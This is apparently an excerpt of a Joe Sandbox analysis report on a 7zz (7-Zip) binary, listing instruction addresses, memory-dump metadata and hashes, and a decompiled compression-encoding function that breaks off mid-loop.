                                                                      0x00434fd0
                                                                      0x00434fd2
                                                                      0x004350cd
                                                                      0x004350d2
                                                                      0x004350d4
                                                                      0x004350d7
                                                                      0x0043514f
                                                                      0x00435158
                                                                      0x0043515b
                                                                      0x0043515e
                                                                      0x00435163
                                                                      0x00435163
                                                                      0x00435166
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435170
                                                                      0x00435175
                                                                      0x00435175
                                                                      0x00435182
                                                                      0x0043518a
                                                                      0x00435197
                                                                      0x00435197
                                                                      0x00435199
                                                                      0x0043519b
                                                                      0x0043519e
                                                                      0x004351a1
                                                                      0x004351a1
                                                                      0x004351a4
                                                                      0x004351a7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004351ad
                                                                      0x004351b1
                                                                      0x004351b6
                                                                      0x004351b6
                                                                      0x004351b9
                                                                      0x004351c5
                                                                      0x004351d3
                                                                      0x004351d9
                                                                      0x004351dc
                                                                      0x004351df
                                                                      0x0043522d
                                                                      0x0043522d
                                                                      0x00000000
                                                                      0x004351e1
                                                                      0x004351e5
                                                                      0x004351ea
                                                                      0x004351ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004351ef
                                                                      0x004351ef
                                                                      0x004351f2
                                                                      0x004351f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004351ff
                                                                      0x00435204
                                                                      0x00435204
                                                                      0x00435211
                                                                      0x0043521c
                                                                      0x00435223
                                                                      0x00435223
                                                                      0x00435225
                                                                      0x00435227
                                                                      0x0043522a
                                                                      0x00000000
                                                                      0x0043522a
                                                                      0x004351df
                                                                      0x00435235
                                                                      0x0043523e
                                                                      0x00435244
                                                                      0x0043524d
                                                                      0x00435256
                                                                      0x0043525e
                                                                      0x00435260
                                                                      0x00435262
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435268
                                                                      0x0043526a
                                                                      0x0043526f
                                                                      0x00435272
                                                                      0x0043528c
                                                                      0x0043528c
                                                                      0x00435274
                                                                      0x00435276
                                                                      0x00435278
                                                                      0x0043527b
                                                                      0x0043527e
                                                                      0x00435281
                                                                      0x00435284
                                                                      0x00435284
                                                                      0x0043528e
                                                                      0x00435290
                                                                      0x00435293
                                                                      0x00435298
                                                                      0x00435298
                                                                      0x004352a1
                                                                      0x004352b6
                                                                      0x004352d2
                                                                      0x004352da
                                                                      0x004352e4
                                                                      0x004352e4
                                                                      0x004352e7
                                                                      0x00435414
                                                                      0x0043541c
                                                                      0x00435428
                                                                      0x0043542d
                                                                      0x00435430
                                                                      0x00435435
                                                                      0x00435439
                                                                      0x00435439
                                                                      0x00435439
                                                                      0x0043543d
                                                                      0x00435440
                                                                      0x00435443
                                                                      0x0043544c
                                                                      0x0043544f
                                                                      0x00435451
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435457
                                                                      0x0043545d
                                                                      0x00435460
                                                                      0x00435807
                                                                      0x0043580e
                                                                      0x00435810
                                                                      0x00435812
                                                                      0x0043587e
                                                                      0x00435884
                                                                      0x0043588a
                                                                      0x0043588e
                                                                      0x00435891
                                                                      0x00000000
                                                                      0x00435891
                                                                      0x00435814
                                                                      0x00435817
                                                                      0x0043581b
                                                                      0x00435826
                                                                      0x0043582a
                                                                      0x00435832
                                                                      0x00435836
                                                                      0x0043583e
                                                                      0x00435842
                                                                      0x0043584a
                                                                      0x0043584e
                                                                      0x00435856
                                                                      0x0043585a
                                                                      0x00435862
                                                                      0x00435866
                                                                      0x0043586b
                                                                      0x0043586b
                                                                      0x0043586b
                                                                      0x00435872
                                                                      0x00000000
                                                                      0x00435872
                                                                      0x0043546b
                                                                      0x00435472
                                                                      0x0043547e
                                                                      0x00435481
                                                                      0x004354d6
                                                                      0x004354d6
                                                                      0x004354d9
                                                                      0x004354e0
                                                                      0x004354e3
                                                                      0x004354f5
                                                                      0x004354f8
                                                                      0x004354fc
                                                                      0x00435500
                                                                      0x00435502
                                                                      0x00435502
                                                                      0x00435502
                                                                      0x00435502
                                                                      0x00435514
                                                                      0x00435519
                                                                      0x0043551c
                                                                      0x0043551f
                                                                      0x00000000
                                                                      0x00435525
                                                                      0x00435525
                                                                      0x00435527
                                                                      0x004355bc
                                                                      0x004355c3
                                                                      0x004355c7
                                                                      0x004355cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004355e0
                                                                      0x004355e8
                                                                      0x004355eb
                                                                      0x004355f1
                                                                      0x004355f2
                                                                      0x004355f5
                                                                      0x004355fb
                                                                      0x00435604
                                                                      0x00435609
                                                                      0x0043560f
                                                                      0x00435617
                                                                      0x00435619
                                                                      0x0043561b
                                                                      0x004356a7
                                                                      0x004356aa
                                                                      0x004356aa
                                                                      0x004356ad
                                                                      0x004356b0
                                                                      0x004356b3
                                                                      0x004356b6
                                                                      0x004356c0
                                                                      0x004356c0
                                                                      0x004356c5
                                                                      0x004356c5
                                                                      0x004356c7
                                                                      0x004356ca
                                                                      0x004356cd
                                                                      0x004356cd
                                                                      0x004356d5
                                                                      0x004356d7
                                                                      0x004356e5
                                                                      0x004356ee
                                                                      0x004356ee
                                                                      0x004356f0
                                                                      0x00435731
                                                                      0x00435734
                                                                      0x00435746
                                                                      0x00435749
                                                                      0x00435749
                                                                      0x0043574c
                                                                      0x004357db
                                                                      0x00000000
                                                                      0x004357db
                                                                      0x00435752
                                                                      0x00435756
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043575c
                                                                      0x0043575f
                                                                      0x00435763
                                                                      0x00435765
                                                                      0x0043576a
                                                                      0x0043576a
                                                                      0x00435773
                                                                      0x00435777
                                                                      0x0043577c
                                                                      0x0043577f
                                                                      0x00435783
                                                                      0x00435785
                                                                      0x0043578a
                                                                      0x0043578a
                                                                      0x0043578d
                                                                      0x00435790
                                                                      0x00435794
                                                                      0x00435796
                                                                      0x0043579b
                                                                      0x0043579b
                                                                      0x0043579e
                                                                      0x004357a1
                                                                      0x004357a5
                                                                      0x004357a7
                                                                      0x004357ac
                                                                      0x004357ac
                                                                      0x004357b2
                                                                      0x004357b6
                                                                      0x004357be
                                                                      0x004357c2
                                                                      0x004357c7
                                                                      0x004357c7
                                                                      0x004357c7
                                                                      0x004357ce
                                                                      0x004357d3
                                                                      0x004357d3
                                                                      0x00000000
                                                                      0x004357d3
                                                                      0x004356f2
                                                                      0x004356f2
                                                                      0x004356f3
                                                                      0x00435726
                                                                      0x0043572c
                                                                      0x00000000
                                                                      0x0043572c
                                                                      0x004356f5
                                                                      0x004356f5
                                                                      0x004356f6
                                                                      0x00435712
                                                                      0x00435718
                                                                      0x00000000
                                                                      0x00435718
                                                                      0x004356f8
                                                                      0x004356f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435701
                                                                      0x00435707
                                                                      0x00000000
                                                                      0x00435707
                                                                      0x004356d9
                                                                      0x004356df
                                                                      0x004356df
                                                                      0x004356e2
                                                                      0x00000000
                                                                      0x004356e2
                                                                      0x004356db
                                                                      0x004356dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004356dd
                                                                      0x004356b8
                                                                      0x004356be
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004356be
                                                                      0x00435621
                                                                      0x00435624
                                                                      0x00435628
                                                                      0x0043562a
                                                                      0x0043562f
                                                                      0x0043562f
                                                                      0x00435638
                                                                      0x0043563c
                                                                      0x00435641
                                                                      0x00435644
                                                                      0x00435648
                                                                      0x0043564a
                                                                      0x0043564f
                                                                      0x0043564f
                                                                      0x00435652
                                                                      0x00435655
                                                                      0x00435659
                                                                      0x0043565b
                                                                      0x00435660
                                                                      0x00435660
                                                                      0x00435663
                                                                      0x00435666
                                                                      0x0043566a
                                                                      0x0043566c
                                                                      0x00435671
                                                                      0x00435671
                                                                      0x00435674
                                                                      0x00435677
                                                                      0x0043567b
                                                                      0x0043567d
                                                                      0x00435682
                                                                      0x00435682
                                                                      0x00435685
                                                                      0x00435688
                                                                      0x0043568c
                                                                      0x0043568e
                                                                      0x00435693
                                                                      0x00435693
                                                                      0x00435696
                                                                      0x00435699
                                                                      0x0043569d
                                                                      0x00000000
                                                                      0x0043569d
                                                                      0x0043552d
                                                                      0x00435530
                                                                      0x00435534
                                                                      0x00435536
                                                                      0x0043553b
                                                                      0x0043553b
                                                                      0x00435544
                                                                      0x00435548
                                                                      0x0043554d
                                                                      0x00435550
                                                                      0x00435554
                                                                      0x00435556
                                                                      0x0043555b
                                                                      0x0043555b
                                                                      0x0043555e
                                                                      0x00435561
                                                                      0x00435565
                                                                      0x00435567
                                                                      0x0043556c
                                                                      0x0043556c
                                                                      0x0043556f
                                                                      0x00435572
                                                                      0x00435576
                                                                      0x00435578
                                                                      0x0043557d
                                                                      0x0043557d
                                                                      0x00435580
                                                                      0x00435583
                                                                      0x00435587
                                                                      0x00435589
                                                                      0x0043558e
                                                                      0x0043558e
                                                                      0x00435591
                                                                      0x00435594
                                                                      0x00435598
                                                                      0x0043559a
                                                                      0x0043559f
                                                                      0x0043559f
                                                                      0x004355a2
                                                                      0x004355a5
                                                                      0x004355a9
                                                                      0x004355ab
                                                                      0x004355b4
                                                                      0x004355b4
                                                                      0x00000000
                                                                      0x004355ab
                                                                      0x0043551f
                                                                      0x004354e5
                                                                      0x004354e8
                                                                      0x004354ec
                                                                      0x00000000
                                                                      0x004354ec
                                                                      0x00435483
                                                                      0x0043548c
                                                                      0x00435494
                                                                      0x00435497
                                                                      0x00435499
                                                                      0x004354a1
                                                                      0x004354a1
                                                                      0x0043549b
                                                                      0x0043549b
                                                                      0x0043549b
                                                                      0x004354ab
                                                                      0x004354b0
                                                                      0x004354bb
                                                                      0x004354c4
                                                                      0x004354c6
                                                                      0x004354c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004354c8
                                                                      0x004357e4
                                                                      0x004357e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004357f1
                                                                      0x004357f3
                                                                      0x004357f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435800
                                                                      0x00435803
                                                                      0x00435805
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004352ed
                                                                      0x004352ed
                                                                      0x004352ed
                                                                      0x004352ee
                                                                      0x004353d0
                                                                      0x004353d7
                                                                      0x004353d9
                                                                      0x004353e4
                                                                      0x004353e6
                                                                      0x004353e9
                                                                      0x004353eb
                                                                      0x004353ef
                                                                      0x004353f8
                                                                      0x004353f8
                                                                      0x004353f1
                                                                      0x004353f1
                                                                      0x004353f1
                                                                      0x004353fe
                                                                      0x00435402
                                                                      0x00435408
                                                                      0x00435408
                                                                      0x00435410
                                                                      0x00000000
                                                                      0x00435410
                                                                      0x004352f4
                                                                      0x004352f4
                                                                      0x004352f5
                                                                      0x0043538a
                                                                      0x0043538e
                                                                      0x00435390
                                                                      0x0043539b
                                                                      0x0043539d
                                                                      0x004353a0
                                                                      0x004353a2
                                                                      0x004353a6
                                                                      0x004353af
                                                                      0x004353af
                                                                      0x004353a8
                                                                      0x004353a8
                                                                      0x004353a8
                                                                      0x004353b5
                                                                      0x004353b9
                                                                      0x004353bc
                                                                      0x004353bc
                                                                      0x004353c8
                                                                      0x00000000
                                                                      0x004353c8
                                                                      0x004352fb
                                                                      0x004352fc
                                                                      0x00435335
                                                                      0x00435339
                                                                      0x0043533b
                                                                      0x00435346
                                                                      0x00435348
                                                                      0x0043534b
                                                                      0x0043534d
                                                                      0x00435351
                                                                      0x0043535c
                                                                      0x0043535c
                                                                      0x00435353
                                                                      0x00435355
                                                                      0x00435355
                                                                      0x00435362
                                                                      0x00435366
                                                                      0x00435369
                                                                      0x00435369
                                                                      0x0043537b
                                                                      0x0043537d
                                                                      0x0043537f
                                                                      0x00000000
                                                                      0x00435385
                                                                      0x004354ca
                                                                      0x004354ca
                                                                      0x004354cd
                                                                      0x00000000
                                                                      0x004354cd
                                                                      0x0043537f
                                                                      0x00435305
                                                                      0x00435307
                                                                      0x00435309
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00435312
                                                                      0x00435316
                                                                      0x00435316
                                                                      0x00435316
                                                                      0x0043531c
                                                                      0x0043531f
                                                                      0x00000000
                                                                      0x0043531f
                                                                      0x004352e7
                                                                      0x004350db
                                                                      0x004350e1
                                                                      0x004350e4
                                                                      0x004350e8
                                                                      0x004350f4
                                                                      0x004350fb
                                                                      0x004350fd
                                                                      0x004350ff
                                                                      0x0043510e
                                                                      0x0043510e
                                                                      0x00435111
                                                                      0x00000000
                                                                      0x00435111
                                                                      0x00435108
                                                                      0x0043510a
                                                                      0x0043510c
                                                                      0x0043511a
                                                                      0x0043511d
                                                                      0x0043511f
                                                                      0x00435124
                                                                      0x00435127
                                                                      0x00435127
                                                                      0x00435127
                                                                      0x00435127
                                                                      0x00435133
                                                                      0x00435135
                                                                      0x00435138
                                                                      0x0043513a
                                                                      0x00000000
                                                                      0x0043513a
                                                                      0x00000000
                                                                      0x00434fd8
                                                                      0x00434fda
                                                                      0x00434fe0
                                                                      0x00434fe3
                                                                      0x00434fe7
                                                                      0x00434ff3
                                                                      0x00434ffa
                                                                      0x00434ffc
                                                                      0x00434ffe
                                                                      0x0043509a
                                                                      0x0043509c
                                                                      0x0043509e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004350a4
                                                                      0x004350a7
                                                                      0x004350a9
                                                                      0x004350ae
                                                                      0x004350b1
                                                                      0x004350b1
                                                                      0x004350b1
                                                                      0x004350b1
                                                                      0x004350bc
                                                                      0x004350be
                                                                      0x004350c1
                                                                      0x004350c3
                                                                      0x0043513e
                                                                      0x0043513e
                                                                      0x00435322
                                                                      0x00435322
                                                                      0x00435324
                                                                      0x0043532d
                                                                      0x0043532d
                                                                      0x00000000
                                                                      0x00435324
                                                                      0x0043500b
                                                                      0x0043500b
                                                                      0x0043500d
                                                                      0x00435012
                                                                      0x00435012
                                                                      0x00435015
                                                                      0x0043501b
                                                                      0x0043501f
                                                                      0x00435024
                                                                      0x00435027
                                                                      0x0043502b
                                                                      0x0043502d
                                                                      0x00435032
                                                                      0x00435032
                                                                      0x00435035
                                                                      0x00435038
                                                                      0x0043503c
                                                                      0x0043503e
                                                                      0x00435043
                                                                      0x00435043
                                                                      0x00435046
                                                                      0x00435049
                                                                      0x0043504d
                                                                      0x0043504f
                                                                      0x00435054
                                                                      0x00435054
                                                                      0x00435057
                                                                      0x0043505a
                                                                      0x0043505e
                                                                      0x00435060
                                                                      0x00435065
                                                                      0x00435065
                                                                      0x00435068
                                                                      0x0043506b
                                                                      0x0043506f
                                                                      0x00435071
                                                                      0x00435076
                                                                      0x00435076
                                                                      0x00435079
                                                                      0x0043507c
                                                                      0x00435080
                                                                      0x00435082
                                                                      0x00435082
                                                                      0x0043508b
                                                                      0x0043508b
                                                                      0x00435877
                                                                      0x00435877
                                                                      0x00000000
                                                                      0x00435877
                                                                      0x00435004
                                                                      0x00435004
                                                                      0x00435007
                                                                      0x00000000
                                                                      0x00435007
                                                                      0x00434fd2
                                                                      0x004358a1
                                                                      0x004358a5
                                                                      0x004358ad
                                                                      0x004358b1
                                                                      0x004358b9
                                                                      0x004358bd
                                                                      0x004358c5
                                                                      0x004358c9
                                                                      0x004358d1
                                                                      0x004358d5
                                                                      0x004358dd
                                                                      0x004358e1
                                                                      0x004358e6
                                                                      0x004358e6
                                                                      0x004358e6
                                                                      0x004358ed
                                                                      0x00000000
                                                                      0x00434eeb
                                                                      0x00434eeb
                                                                      0x00434eee
                                                                      0x00434ef2
                                                                      0x00434ef4
                                                                      0x00434ef9
                                                                      0x00434ef9
                                                                      0x00434efc
                                                                      0x00434eff
                                                                      0x00434f03
                                                                      0x00434f05
                                                                      0x00434f0a
                                                                      0x00434f0a
                                                                      0x00434f0d
                                                                      0x00434f10
                                                                      0x00434f14
                                                                      0x00434f16
                                                                      0x00434f1b
                                                                      0x00434f1b
                                                                      0x00434f1e
                                                                      0x00434f21
                                                                      0x00434f25
                                                                      0x00434f27
                                                                      0x00434f2c
                                                                      0x00434f2c
                                                                      0x00434f2f
                                                                      0x00434f32
                                                                      0x00434f36
                                                                      0x00434f38
                                                                      0x00434f3d
                                                                      0x00434f3d
                                                                      0x00434f40
                                                                      0x00434f43
                                                                      0x00434f47
                                                                      0x00434f49
                                                                      0x00434f4e
                                                                      0x00434f4e
                                                                      0x00434f51
                                                                      0x00434f56
                                                                      0x00434f5b
                                                                      0x00434f64
                                                                      0x00434f64
                                                                      0x00434ee9

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00434D2D
                                                                        • Part of subcall function 004358FF: __EH_prolog.LIBCMT ref: 00435904
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
                                                                      • Instruction ID: 4d673e12acc69f6e7e4ec967f927a2294ce107ae818d378fe87eae4aebf1c3ce
                                                                      • Opcode Fuzzy Hash: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
                                                                      • Instruction Fuzzy Hash: 91926D70D00659DFDF14DFA8C594BAEBBB4BF48304F14409AE845AB382DB38AE45CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00448730 Relevance: 1.9, Strings: 1, Instructions: 670COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E00448730(intOrPtr __ecx, void* __eflags) {
				void* _t321;
				unsigned int _t322;
				signed int _t331;
				signed char _t334;
				signed int _t335;
				intOrPtr* _t337;
				intOrPtr _t341;
				signed int _t342;
				signed int _t345;
				signed int _t346;
				void* _t347;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t361;
				intOrPtr* _t364;
				signed int _t368;
				char _t369;
				char _t370;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int* _t385;
				intOrPtr _t387;
				intOrPtr _t399;
				void* _t414;
				signed int _t417;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t429;
				char _t430;
				void* _t431;
				signed char _t433;
				intOrPtr _t444;
				signed int _t461;
				void* _t469;
				signed int* _t470;
				void* _t475;
				intOrPtr _t478;
				void* _t479;
				void* _t483;
				void* _t484;
				signed int _t498;
				signed int* _t499;
				signed char _t500;
				void* _t519;
				unsigned int _t525;
				char _t536;
				void* _t538;
				intOrPtr _t539;
				signed int* _t544;
				intOrPtr _t552;
				signed int _t565;
				signed char _t568;
				intOrPtr* _t572;
				signed int _t575;
				signed int _t576;
				intOrPtr _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				void* _t589;
				void* _t591;
				void* _t592;
				void* _t593;
				unsigned int _t595;
				signed int _t596;
				intOrPtr _t598;
				void* _t599;
				unsigned int _t600;
				void* _t601;
				signed int _t604;
				signed int _t605;
				void* _t608;
				intOrPtr* _t609;
				intOrPtr _t610;
				void* _t611;
				intOrPtr* _t612;
				void* _t613;
				void* _t614;
				signed int _t616;
				intOrPtr _t627;
				signed int _t628;
				intOrPtr _t629;
				intOrPtr _t631;
				intOrPtr _t632;
				void* _t633;
				void* _t634;
				void* _t635;
				void* _t636;

				_t627 = __ecx;
				 *((intOrPtr*)(_t634 + 0x58)) = __ecx;
				E00448610(0);
				_t598 =  *((intOrPtr*)(_t634 + 0x680));
				_push(_t598);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + E00459170( *((intOrPtr*)(__ecx + 0xc)),  *((intOrPtr*)(_t634 + 0x67c))) * 4)) = _t598;
				E00448580(__ecx, _t318, 0x18);
				 *((intOrPtr*)(_t634 + 0x60)) = 0;
				 *((intOrPtr*)(_t634 + 0x64)) = 0;
				_t414 = 0;
				 *((intOrPtr*)(_t634 + 0x68)) = 0;
				_t321 = memset(_t634 + 0x170, 0, 0x40 << 2);
				_t635 = _t634 + 0xc;
				 *((intOrPtr*)(_t635 + 0x6c)) = 0;
				if(_t598 > 0) {
					do {
						_t321 = _t321 + 1;
						 *((char*)(_t635 + 0x170)) = 1;
					} while (_t321 < _t598);
				}
				_t322 = 0;
				do {
					if( *((intOrPtr*)(_t635 + _t322 + 0x170)) != 0) {
						 *(_t635 + _t414 + 0x70) = _t322;
						_t414 = _t414 + 1;
						 *((char*)(_t635 + (_t322 >> 4) + 0x60)) = 1;
					}
					_t322 = _t322 + 1;
				} while (_t322 < 0x100);
				_t599 = 0;
				do {
					E00448610( *((intOrPtr*)(_t635 + _t599 + 0x60)));
					_t599 = _t599 + 1;
				} while (_t599 < 0x10);
				_t600 = 0;
				do {
					if( *((intOrPtr*)(_t635 + (_t600 >> 4) + 0x60)) != 0) {
						E00448610( *((intOrPtr*)(_t635 + _t600 + 0x170)));
					}
					_t600 = _t600 + 1;
				} while (_t600 < 0x100);
				 *((intOrPtr*)(_t635 + 0x3c)) =  *((intOrPtr*)(_t627 + 4));
				memset(_t635 + 0x270, 0, 0x102 << 2);
				_t636 = _t635 + 0xc;
				_t585 =  *((intOrPtr*)(_t636 + 0x3c));
				_t601 = 0;
				_t525 = 0;
				 *(_t636 + 0x38) = _t414 + 2;
				 *(_t636 + 0x1c) = 0;
				 *((intOrPtr*)(_t636 + 0x67c)) =  *((intOrPtr*)(_t636 + 0x67c)) - 1;
				 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t627 + 0xc));
				do {
					_t461 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t636 + 0x20)))) +  *((intOrPtr*)(_t636 + 0x67c))));
					_t331 = 0;
					 *(_t636 + 0x17) = _t461;
					if( *(_t636 + 0x70) != _t461) {
						do {
							_t444 =  *((intOrPtr*)(_t636 + _t331 + 0x71));
							_t331 = _t331 + 1;
						} while (_t444 != _t461);
					}
					_t417 = _t331;
					 *(_t636 + 0x2c) = _t417;
					if(_t331 >= 8) {
						_t519 = _t636 + 0x70 - 1;
						do {
							 *((char*)(_t519 + _t331 + 1)) =  *((intOrPtr*)(_t519 + _t331));
							 *((char*)(_t519 + _t331)) =  *((intOrPtr*)(_t519 + _t331 - 1));
							 *((char*)(_t519 + _t331 - 1)) =  *((intOrPtr*)(_t519 + _t331 - 2));
							 *((char*)(_t519 + _t331 - 2)) =  *((intOrPtr*)(_t519 + _t331 - 3));
							 *((char*)(_t519 + _t331 - 3)) =  *((intOrPtr*)(_t519 + _t331 - 4));
							 *((char*)(_t519 + _t331 - 4)) =  *((intOrPtr*)(_t519 + _t331 - 5));
							 *((char*)(_t519 + _t331 - 5)) =  *((intOrPtr*)(_t519 + _t331 - 6));
							 *((char*)(_t519 + _t331 - 6)) =  *((intOrPtr*)(_t519 + _t331 - 7));
							_t331 = _t331 - 8;
						} while (_t331 >= 8);
						_t417 =  *(_t636 + 0x2c);
						_t461 =  *(_t636 + 0x17);
					}
					if(_t331 > 0) {
						do {
							 *((char*)(_t636 + _t331 + 0x70)) =  *((intOrPtr*)(_t636 + _t331 + 0x6f));
							_t331 = _t331 - 1;
						} while (_t331 > 0);
						_t417 =  *(_t636 + 0x2c);
					}
					 *(_t636 + 0x70) = _t461;
					if(_t417 != 0) {
						if(_t525 != 0) {
							do {
								_t576 = _t525 - 1;
								 *(_t601 + _t585) = _t576 & 0x00000001;
								_t601 = _t601 + 1;
								_t525 = _t576 >> 1;
								 *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) + 1;
							} while (_t525 != 0);
						}
						if(_t417 < 0xfe) {
							 *(_t601 + _t585) = _t417 + 1;
						} else {
							 *(_t601 + _t585) = 0xff;
							_t601 = _t601 + 1;
							 *(_t601 + _t585) = _t417 + 2;
						}
						_t601 = _t601 + 1;
						 *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) =  *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) + 1;
					} else {
						_t525 = _t525 + 1;
					}
					_t334 =  *(_t636 + 0x1c) + 1;
					 *(_t636 + 0x1c) = _t334;
					 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t636 + 0x20)) + 4;
				} while (_t334 <  *((intOrPtr*)(_t636 + 0x680)));
				if(_t525 != 0) {
					do {
						_t575 = _t525 - 1;
						 *(_t601 + _t585) = _t575 & 0x00000001;
						_t601 = _t601 + 1;
						_t525 = _t575 >> 1;
						 *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) + 1;
					} while (_t525 != 0);
				}
				_t335 =  *(_t636 + 0x38);
				if(_t335 >= 0x100) {
					 *(_t601 + _t585) = 0xff;
					_t601 = _t601 + 1;
					 *(_t601 + _t585) = _t335;
				} else {
					 *(_t601 + _t585) = _t335 - 1;
				}
				 *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) =  *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) + 1;
				 *((intOrPtr*)(_t636 + 0x20)) = _t601 + 1;
				_t420 = 0;
				_t337 = _t636 + 0x270;
				_t469 = 0x102;
				do {
					_t586 =  *_t337;
					_t337 = _t337 + 4;
					_t420 = _t420 + _t586;
					_t469 = _t469 - 1;
				} while (_t469 != 0);
				_t470 =  *(_t627 + 0x10);
				_t587 = 2;
				 *(_t636 + 0x5c) = _t420;
				 *(_t636 + 0x48) = 2;
				 *((intOrPtr*)(_t636 + 0x50)) = 0xffffffff;
				 *(_t636 + 0x2c) = 2;
				_t604 = 8 +  *_t470 * 8 - _t470[1];
				 *(_t636 + 0x17) = _t470[2];
				_t138 = _t420 + 0x31; // 0x31
				 *(_t636 + 0x58) = _t604;
				 *(_t636 + 0x4c) = 0x51eb851f * _t138 >> 0x20 >> 4;
				while(1) {
					_t341 =  *((intOrPtr*)(_t627 + 0x8cdc));
					if(_t341 == 0) {
						goto L44;
					}
					 *_t470 = _t604 >> 3;
					_t470[1] = 8;
					_t499 =  *(_t627 + 0x10);
					_t499[1] = 8 - (_t604 & 0x00000007);
					_t499[2] =  *(_t636 + 0x17);
					if(_t587 > 6) {
						_t342 =  *(_t636 + 0x48);
						L51:
						 *(_t636 + 0x18) = _t342;
					} else {
						 *(_t636 + 0x18) = _t587;
					}
					L52:
					_t588 =  *(_t636 + 0x18);
					E00448580(_t627, _t588, 3);
					E00448580(_t627,  *(_t636 + 0x4c), 0xf);
					_t345 = _t420;
					_t421 = 0;
					 *(_t636 + 0x1c) = _t345;
					 *(_t636 + 0x10) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = _t627 + ((_t588 << 7) + _t588) * 2 - 0xee;
					do {
						_t475 = 0;
						_t346 = _t345 / _t588;
						_t605 = _t421;
						if(_t346 > 0) {
							_t572 = _t636 + 0x270 + _t421 * 4;
							do {
								_t631 =  *_t572;
								_t572 = _t572 + 4;
								_t475 = _t475 + _t631;
								_t605 = _t605 + 1;
							} while (_t475 < _t346);
						}
						_t173 = _t605 - 1; // 0x0
						_t628 = _t173;
						if(_t628 > _t421 && _t588 !=  *(_t636 + 0x18) && _t588 != 1 && ( *(_t636 + 0x10) & 0x00000001) == 1) {
							_t605 = _t628;
							_t475 = _t475 -  *((intOrPtr*)(_t636 + 0x270 + _t605 * 4));
						}
						_t629 =  *((intOrPtr*)(_t636 + 0x24));
						_t347 = 0;
						do {
							if(_t347 < _t421 || _t347 >= _t605) {
								_t536 = 1;
							} else {
								_t536 = 0;
							}
							 *((char*)(_t347 + _t629)) = _t536;
							_t347 = _t347 + 1;
						} while (_t347 <  *(_t636 + 0x38));
						_t421 = _t605;
						_t345 =  *(_t636 + 0x1c) - _t475;
						_t588 = _t588 - 1;
						 *(_t636 + 0x1c) = _t345;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 1;
						 *((intOrPtr*)(_t636 + 0x24)) = _t629 - 0x102;
					} while (_t588 != 0);
					_t632 =  *((intOrPtr*)(_t636 + 0x54));
					 *(_t636 + 0x28) = 4;
					do {
						_t422 =  *(_t636 + 0x18);
						_t538 = 0;
						_t608 = _t632 + 0x620;
						do {
							_t589 = _t608;
							_t538 = _t538 + 1;
							_t608 = _t608 + 0x408;
							memset(_t589, 0, 0x102 << 2);
							_t636 = _t636 + 0xc;
						} while (_t538 < _t422);
						_t478 = 0;
						 *((intOrPtr*)(_t636 + 0x34)) = 0;
						 *(_t636 + 0x1c) = _t632 + 0x3680;
						do {
